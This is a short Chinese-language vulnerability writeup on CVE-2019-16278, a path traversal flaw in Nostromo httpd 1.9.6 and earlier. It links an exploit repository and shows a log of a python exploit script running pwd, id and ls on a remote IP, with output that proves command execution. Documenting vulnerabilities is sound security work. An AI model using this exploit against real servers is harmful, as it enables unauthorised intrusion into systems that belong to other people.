001-CVE-2019-16278 Nostromo httpd 命令执行

# CVE-2019-16278 Nostromo httpd 命令执行

### 一、漏洞简介

Nostromo httpd 1.9.6及之前版本中的‘http_verify’函数存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。

### 二、影响范围

Nostromo httpd 1.9.6及之前版本中

### 三、复现过程

https://github.com/ianxtianxt/CVE-2019-16278/

“`bash
➜ Downloads python nostromo.py 114.114.114.114 8080 pwd
/bin
➜ Downloads python nostromo.py 114.114.114.114 8080 id
uid=65534 gid=65534
➜ Downloads python nostromo.py 114.114.114.114 8080 “ls -al”
drwxr-xr-x 2 0 0 0 Apr 12 2013 .
drwxr-xr-x 16 0 0 0 Jan 1 1970 ..
lrwxrwxrwx 1 0 0 7 Apr 12 2013 ash -> busybox
“`

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容